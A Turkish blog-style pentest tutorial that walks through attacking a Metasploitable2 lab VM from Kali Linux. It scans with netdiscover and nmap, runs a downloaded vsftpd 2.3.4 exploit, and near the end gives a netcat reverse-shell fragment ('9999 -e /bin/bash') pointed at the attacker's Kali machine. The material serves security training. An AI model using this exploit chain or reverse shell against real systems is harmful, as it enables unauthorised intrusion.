Linux Güvenlik Acigi(exploit) İstismari

Merhaba Arkadaslar Linux güvenlik acigi(exploit) istismari ile ilglii olarak surec asagidaki gibidir. Detaylandirarak anlatmaya calistim. Keyifli okumalar dilerim.


Not: screnshotlarin yukleme sirasinda .png base 64 linkleri cok uzun oldugundan dolayi(Karakter siniri asmasi sebebi ile) png screnshotlar uplooad edilerek linkleri metin altlarina ilave edilmistir.



Sızma(pentest) işleminde İç ağa sızıldığı taktirde aşağıdaki işlemler gerçeklestirilebilinir.


İslemler Kali linux ve ****sploitable2 makinalarinda gerceklestirilmistir.
*Kali linux ve ****sploitable2 makinalari aktif hale getirdikten sonra islemlere baslayabilirsiniz.
Netdiscover ile iç ağ'da öncelikle tarama baslatalim.





yapmis oldugunuz taramaya istinaden, hangi cihaza işlem yapacak iseniz o cihazın ip sini kullanabilirsiniz. Biz suan 192.168.129.130 ****sploitable2 ip adresini kullanacagiz.
nmap ile sistemdeki açık olan portlari taramasini gerceklestirelim. Elde edecegimiz acik portlardan en uygunu ile gerekli exploit aramamizi gerceklestirip islemlerimize devam edecegiz.
Baska bir komut satiri acip nmap taramizi gerceklestiriyoruz.
nmap 192.168.129.130 -sS -sV servis ve versiyon bilgilerini elde etmeye calisalim.





Arama sonuclari asagidaki gibi karsimiza cikacaktir.
Çikan sonuclardan 21/TCP port FTP protunun acik oldugu ve version bilgisinin geldiğini goruyoruz.
Version bilgisini alip Google(Farkli bir arama motoruda secebilirsiniz) arama moturu üzerinde arama gerceklestirilmesi gerekmektedir.



Google arama motoru
vsftpd-2.3.4 version hakkinda exploit aramasi gerceklestirdik. Karsimiza bircok siteden bilgi geldi. Yillardir takipte oldgumuz rapid7 sitesinin daha güvenilir oldugunu kanisini tasiyarak, bu siteden indirelebilirsiniz.Diger bir secenek ise devasa proje havuzuna sahip Github adresinden download islemi yapabilirsiniz.




Github adresinden iligli exploit i kali linux masaustune indiriniz.




download isleminden sonra zip li klasor halinde masaustune inecektir.




Komut satırını tekrar aciyor ve komut satirindan ilgili dosyanin icerisine giris yapiyoruz.



ve .py uzantili dosyamizi python3 komutu ile download etmis oldugumuz exploiti calistiriyoruz.



Bu sekilde istismar islemini gerceklestirip ls komutu ile dosya ve klasorlere ulasmis oluyorsunuz.



**Diger bir islemimizde Netcat aracinin kullanarak istediginiz bilgisiyara klasor yolu vermektir.



Hangi bilgisayara erisim olmasini istiyorsaniz o bilgisayarin ip adresini girmelisiniz.(Kali örnektir)
Netcat araci kali ile yuklu gelkir gelmedi ise kali kutphanesinden kurabilirsiniz.Veya Github üzerinden download yapabilirsiniz.
9999 -e /bin/bash (Bin dizi altinda bulunan komut araci ) kali linux bilgisayara bu ip 192.168.129.128 ve bu komut uzerinden bin/bash dosyasina erisim izni verilmis oldu.










Bilgilerinize sunar, iyi calismalar dilerim

Ben teşekkür ederim. Selamlar